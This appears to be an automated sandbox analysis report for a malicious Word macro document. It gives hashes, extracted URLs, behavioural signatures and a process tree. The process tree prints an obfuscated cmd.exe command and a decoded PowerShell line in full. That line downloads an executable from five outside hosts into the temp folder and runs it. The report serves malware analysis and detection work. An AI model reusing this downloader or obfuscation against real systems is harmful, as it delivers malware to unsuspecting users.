Analysis
-
max time kernel
122s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
20/09/2024, 07:00
Behavioral task
behavioral1
Sample
ed10bfff758a80752bd072e93cb7e7f8_JaffaCakes118.doc
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
ed10bfff758a80752bd072e93cb7e7f8_JaffaCakes118.doc
Resource
win10v2004-20240802-en
General
-
Target
ed10bfff758a80752bd072e93cb7e7f8_JaffaCakes118.doc
-
Size
208KB
-
MD5
ed10bfff758a80752bd072e93cb7e7f8
-
SHA1
aeeacf51e3d94351b658676cd2085d863241ec40
-
SHA256
dde1e4beb358bf4ab02fdad1e477b603c116bfa2c39d9c4c42740738304d4ed7
-
SHA512
d9e8e7e5983e4c7b44ab4e0a7ada73ee5e2a992ea41ab2edf1e4750bc64c787419dad14b56ce2a35b6c0d5a66857e52bf0d58e0080fa35014b387e77c57277f7
-
SSDEEP
6144:XgULVG5HuJG1VqDTQpzAiXajJ7qxPmdvmZ:XtGkIbzvX2qxA
Malware Config
Extracted
http://hawkinscs.com/uBmDMGkJ
http://hydrocarbonreports.com/0
http://grupovisionpr.com/GJjBPh
http://ajx3.com/akDJlHl
http://kazak.zendo.in.ua/7G4P
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process 2528 2516 cmd.exe 29 -
Blocklisted process makes network request 1 IoCs
flow pid Process 5 2908 powershell.exe -
pid Process 2908 powershell.exe 2908 powershell.exe -
An obfuscated cmd.exe command-line is typically used to evade detection. 2 IoCs
pid Process 2528 cmd.exe 2604 cmd.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE -
System Location Discovery: System Language Discovery 1 TTPs 7 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WINWORD.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
Office loads VBA resources, possible macro or embedded object present
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 2516 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2908 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2908 powershell.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 2516 WINWORD.EXE 2516 WINWORD.EXE -
Suspicious use of WriteProcessMemory 28 IoCs
description pid Process procid_target PID 2516 wrote to memory of 2400 2516 WINWORD.EXE 30 PID 2516 wrote to memory of 2400 2516 WINWORD.EXE 30 PID 2516 wrote to memory of 2400 2516 WINWORD.EXE 30 PID 2516 wrote to memory of 2400 2516 WINWORD.EXE 30 PID 2516 wrote to memory of 2528 2516 WINWORD.EXE 31 PID 2516 wrote to memory of 2528 2516 WINWORD.EXE 31 PID 2516 wrote to memory of 2528 2516 WINWORD.EXE 31 PID 2516 wrote to memory of 2528 2516 WINWORD.EXE 31 PID 2528 wrote to memory of 1660 2528 cmd.exe 34 PID 2528 wrote to memory of 1660 2528 cmd.exe 34 PID 2528 wrote to memory of 1660 2528 cmd.exe 34 PID 2528 wrote to memory of 1660 2528 cmd.exe 34 PID 1660 wrote to memory of 1940 1660 cmd.exe 35 PID 1660 wrote to memory of 1940 1660 cmd.exe 35 PID 1660 wrote to memory of 1940 1660 cmd.exe 35 PID 1660 wrote to memory of 1940 1660 cmd.exe 35 PID 1660 wrote to memory of 888 1660 cmd.exe 36 PID 1660 wrote to memory of 888 1660 cmd.exe 36 PID 1660 wrote to memory of 888 1660 cmd.exe 36 PID 1660 wrote to memory of 888 1660 cmd.exe 36 PID 2528 wrote to memory of 2604 2528 cmd.exe 37 PID 2528 wrote to memory of 2604 2528 cmd.exe 37 PID 2528 wrote to memory of 2604 2528 cmd.exe 37 PID 2528 wrote to memory of 2604 2528 cmd.exe 37 PID 2604 wrote to memory of 2908 2604 cmd.exe 38 PID 2604 wrote to memory of 2908 2604 cmd.exe 38 PID 2604 wrote to memory of 2908 2604 cmd.exe 38 PID 2604 wrote to memory of 2908 2604 cmd.exe 38
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\ed10bfff758a80752bd072e93cb7e7f8_JaffaCakes118.doc"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2516 -
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵PID:2400
-
-
C:\Windows\SysWOW64\cmd.execmd /c f^OR ; /^f , " delims=fo2XA tokens= 1 " , ; %^W , iN , ( , ; ' ; ; ^^FT^^yPe ; ^| ; FIN^^d^^S^^Tr , d^^f^^i ' ; ) ; do ; %^W; , yr2eOFUzM/^Vj^]N^j~a0p ; Jq9nYIeM/R " , ( (^SeT _^ =:Xw\=C pd^G^,i^3^(t5^c4DH^)h0^kg^an7}^z^.oFjs^yW'rN-ZS$^;^+b^@xM^e^JB{v^u^mlf^P/) )&& ; , fO^R , ; %^G ; ; ^IN , ( ^7^ +31 ^2^ ^ 50 ^ ^3^8 ^3^4^ 21 +5^0^ 5^7 ^+57 6^ 43^ ^2^3 59 3^4 ^4^ ^26^ ^ 50 ^ 2^ ^ ^40 ^ 31^ ; 46 ^33 5^0 ^ 1^6 ^ 14^ ^ ^;^ ;^ ^6 39 ^; 5^0 14 +3^0 ^ 36^ ^ 50^ ^ ^ 46 ^ 5 ^ 57 ^ ^11 ^ ^50^ ^26 14 44 ^ 43 ^2 58 ^ ,^ ^7^ ^4^ 37 ^ 21 ^ ^14^ 1^4 ^; 7^ ^0 60 ^+^60 ^21 ^25^ 2 , ^ ^,^ ^ 2^3^ ^ ^11 ; ^ 2^6 ^ 34^ ^; ; 16 ^ 3^4 ^, , +3^0 +16 ^ 31 ^ ^56 ^60 ^ 55 +52 5^6 ^ 1^8^ ^ ^49 9 ; 23 5^1 4^7 ^ 2^1^ 14 1^4 ^;^ ^ 7 ^ ^ 0 ^+60 60 ^ ^+21 3^5^ ^8 ^ 38 31 ^ +1^6 ^ 25^ ^3^8^ 46 ^ ^+31^ ^ ,^ ^,^ ^26 38^ ^ 50 7 ^ ^3^1 38 +14 ^34 ^+3^0 ;^ ^16 3^1 ^ ^56^ ,^ , 60^ ^ , 2^2^ 47 ^2^1 ^ 14 , ^14^ ^ 7^ 0 ^ +60 ^, ^ ^,^ 6^0 +^2^4 38^ ^ ^55 ; +7 3^1 ^ ^ ^; ^54^ ;^ ^ 11 ^ ^+34^ 11 3^1^ 26 ^7^ ^ +^38 30 16 3^1 ^ +^5^6^ , ^6^0 9^ ^ 51 33 +52 5^9^ ^, , ^21^ ^+4^7 ^ 2^1 1^4 ^14 ^7 ^ ^0 , 60 ;^ ^ +^60 , 2^5^ ^ 33^ ^ 48 +12 ^ 3^0 ^ 16 3^1 ^56 6^0 ,^ ^ , ^ 25 ^ ^23^ ^18 51 57 19^ ^ ; 57 ^47 21^ ^14 ^ ^ ^+14 7 0^ 6^0 ^ 6^0 23^ ^25 2^9^ ^25 ^ 23^ ^ ^30 ^ 29 ^ 50 26 ^ ^ ^8 +3^1 30^ ^; 11 26 +30 +55^ 25 ^+60 27 9 ^ 17^ 5^9 ^3^7 30^ 42 +^7 ^57 ^ 1^1 ^;^ 14 ^ +13 ^37 ^ ^ ;^ ^; ^47 ^37 ^ ^20 4^4 43 33 ,^ ^4^2 3^2 6 ; ; ^ 4 6 ^37 +15 ^; 12 ^15 37 ^ 44 43^ +4^1^ ^ 31 +1^ 4 , +^43 50^ ;^ ^26^ ^+54 0 ^; 1^4^ ^50 ^; ^ ^5^6^ 7 ^+45 3^7 3 ^+37^ 45 ^ 4^3 ^33 42^ 3^2 ^ 4^5 ^+^37 3^0 ^ 50^ ^4^8 +50^ ^ +37^ ,^ 44 +^5^8^ ^ ^ 3^1^ 3^8^ ^ 50^ +25 ; ^ ; ^ ^16 ^ 21 ; ^ ^13 ^,^ ^43 ^ 4^9 39 ^, ^ , +54 6 , +1^1 ^ 26 6^ 43^ 2 ^58 ^7 20^ 53^ 14 ^+^38^ ^35 53^ ^43^ 23 , ^ ^, ^59 34 ^; ^ 30^ 18^ +^31^ 2^ ^26 57^ 31 , ^,^ 25^ ^ 8 ^ 3^2 ^1^1 ;^ ^ 5^7^ 5^0^ ^ 1^3 43^ 4^9^ ^ 39 54 ^ , ^ ^1^0 , ^ 6 4^3 ^41 ^ ; ^; 31 1 ^; ; +20^ ; ^ 44 42 ^ , ^ ^ 1^4 ^25^ ^ ^+38 ^ 14 ^ ; ^; ^ ^40 59^ ^ 38 ^31 ^ 16 ^ ^50 +^34 ^+34^ 6^ +^43 41^ ^ 31 1 ^44^ ^46^ 3^8 ^ ^50 ^25 ^23 ^ ^; ;^ ^44 2^8 ^;^ ^ ;^ ^16 ^,^ 25 14 ^ ^16 2^1 ^ 53 +28 ^28 ^+6 6^ ^ ^ ^6 ^ 6 ^6 ^ ^6 ^,^ , ^ 6 6 ^6^ ^ +6 ,^ ^6^ +^6^ ^6 ^6 ^ +6 6^ 6 71) , D^o (^SEt ^} ^ =!^} ^ !!_^ :~ %^G, 1!)& , ; ^If ; ; %^G ; =^= ; , ^7^1 ; , (c^ALL ; %^} ^ :^~^ -35^8%) "2⤵
- Process spawned unexpected child process
- An obfuscated cmd.exe command-line is typically used to evade detection.
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2528 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ^FT^yPe | FIN^d^S^Tr d^f^i3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1660 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" FTyPe "4⤵
- System Location Discovery: System Language Discovery
PID:1940
-
-
C:\Windows\SysWOW64\findstr.exeFINdSTr dfi4⤵
- System Location Discovery: System Language Discovery
PID:888
-
-
-
C:\Windows\SysWOW64\cmd.execmd ; , yr2eOFUzM/Vj]Nj~a0p ; Jq9nYIeM/R " , ( (^SeT _^ =:Xw\=C pd^G^,i^3^(t5^c4DH^)h0^kg^an7}^z^.oFjs^yW'rN-ZS$^;^+b^@xM^e^JB{v^u^mlf^P/) )&& ; , fO^R , ; %^G ; ; ^IN , ( ^7^ +31 ^2^ ^ 50 ^ ^3^8 ^3^4^ 21 +5^0^ 5^7 ^+57 6^ 43^ ^2^3 59 3^4 ^4^ ^26^ ^ 50 ^ 2^ ^ ^40 ^ 31^ ; 46 ^33 5^0 ^ 1^6 ^ 14^ ^ ^;^ ;^ ^6 39 ^; 5^0 14 +3^0 ^ 36^ ^ 50^ ^ ^ 46 ^ 5 ^ 57 ^ ^11 ^ ^50^ ^26 14 44 ^ 43 ^2 58 ^ ,^ ^7^ ^4^ 37 ^ 21 ^ ^14^ 1^4 ^; 7^ ^0 60 ^+^60 ^21 ^25^ 2 , ^ ^,^ ^ 2^3^ ^ ^11 ; ^ 2^6 ^ 34^ ^; ; 16 ^ 3^4 ^, , +3^0 +16 ^ 31 ^ ^56 ^60 ^ 55 +52 5^6 ^ 1^8^ ^ ^49 9 ; 23 5^1 4^7 ^ 2^1^ 14 1^4 ^;^ ^ 7 ^ ^ 0 ^+60 60 ^ ^+21 3^5^ ^8 ^ 38 31 ^ +1^6 ^ 25^ ^3^8^ 46 ^ ^+31^ ^ ,^ ^,^ ^26 38^ ^ 50 7 ^ ^3^1 38 +14 ^34 ^+3^0 ;^ ^16 3^1 ^ ^56^ ,^ , 60^ ^ , 2^2^ 47 ^2^1 ^ 14 , ^14^ ^ 7^ 0 ^ +60 ^, ^ ^,^ 6^0 +^2^4 38^ ^ ^55 ; +7 3^1 ^ ^ ^; ^54^ ;^ ^ 11 ^ ^+34^ 11 3^1^ 26 ^7^ ^ +^38 30 16 3^1 ^ +^5^6^ , ^6^0 9^ ^ 51 33 +52 5^9^ ^, , ^21^ ^+4^7 ^ 2^1 1^4 ^14 ^7 ^ ^0 , 60 ;^ ^ +^60 , 2^5^ ^ 33^ ^ 48 +12 ^ 3^0 ^ 16 3^1 ^56 6^0 ,^ ^ , ^ 25 ^ ^23^ ^18 51 57 19^ ^ ; 57 ^47 21^ ^14 ^ ^ ^+14 7 0^ 6^0 ^ 6^0 23^ ^25 2^9^ ^25 ^ 23^ ^ ^30 ^ 29 ^ 50 26 ^ ^ ^8 +3^1 30^ ^; 11 26 +30 +55^ 25 ^+60 27 9 ^ 17^ 5^9 ^3^7 30^ 42 +^7 ^57 ^ 1^1 ^;^ 14 ^ +13 ^37 ^ ^ ;^ ^; ^47 ^37 ^ ^20 4^4 43 33 ,^ ^4^2 3^2 6 ; ; ^ 4 6 ^37 +15 ^; 12 ^15 37 ^ 44 43^ +4^1^ ^ 31 +1^ 4 , +^43 50^ ;^ ^26^ ^+54 0 ^; 1^4^ ^50 ^; ^ ^5^6^ 7 ^+45 3^7 3 ^+37^ 45 ^ 4^3 ^33 42^ 3^2 ^ 4^5 ^+^37 3^0 ^ 50^ ^4^8 +50^ ^ +37^ ,^ 44 +^5^8^ ^ ^ 3^1^ 3^8^ ^ 50^ +25 ; ^ ; ^ ^16 ^ 21 ; ^ ^13 ^,^ ^43 ^ 4^9 39 ^, ^ , +54 6 , +1^1 ^ 26 6^ 43^ 2 ^58 ^7 20^ 53^ 14 ^+^38^ ^35 53^ ^43^ 23 , ^ ^, ^59 34 ^; ^ 30^ 18^ +^31^ 2^ ^26 57^ 31 , ^,^ 25^ ^ 8 ^ 3^2 ^1^1 ;^ ^ 5^7^ 5^0^ ^ 1^3 43^ 4^9^ ^ 39 54 ^ , ^ ^1^0 , ^ 6 4^3 ^41 ^ ; ^; 31 1 ^; ; +20^ ; ^ 44 42 ^ , ^ ^ 1^4 ^25^ ^ ^+38 ^ 14 ^ ; ^; ^ ^40 59^ ^ 38 ^31 ^ 16 ^ ^50 +^34 ^+34^ 6^ +^43 41^ ^ 31 1 ^44^ ^46^ 3^8 ^ ^50 ^25 ^23 ^ ^; ;^ ^44 2^8 ^;^ ^ ;^ ^16 ^,^ 25 14 ^ ^16 2^1 ^ 53 +28 ^28 ^+6 6^ ^ ^ ^6 ^ 6 ^6 ^ ^6 ^,^ , ^ 6 6 ^6^ ^ +6 ,^ ^6^ +^6^ ^6 ^6 ^ +6 6^ 6 71) , D^o (^SEt ^} ^ =!^} ^ !!_^ :~ %^G, 1!)& , ; ^If ; ; %^G ; =^= ; , ^7^1 ; , (c^ALL ; %^} ^ :^~^ -35^8%) "3⤵
- An obfuscated cmd.exe command-line is typically used to evade detection.
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2604 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell $kPs=new-object Net.WebClient;$wfp='http://hawkinscs.com/uBmDMGkJ@http://hydrocarbonreports.com/0@http://grupovisionpr.com/GJjBPh@http://ajx3.com/akDJlHl@http://kazak.zendo.in.ua/7G4P'.Split('@');$jSF = '535';$ZoX=$env:temp+'\'+$jSF+'.exe';foreach($MNv in $wfp){try{$kPs.DownloadFile($MNv, $ZoX);Start-Process $ZoX;break;}catch{}}4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2908
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
19KB
MD589860500de652c94d56e366142dd0352
SHA1f4d65024bb4b1f5f48f6630b91ddd861ee7f139e
SHA256a0c519747db6f6dd82a6a1a7000197408582f9da3f770dc4f8809744266d60cc
SHA512810b18abec5eb8328ee29e9c050b87aa093f1099845e40c611f9288d64b2d2097ca48049253c33faa812fd74748c87341ca95c4c18be2e0aa4ebd9fb48bdba95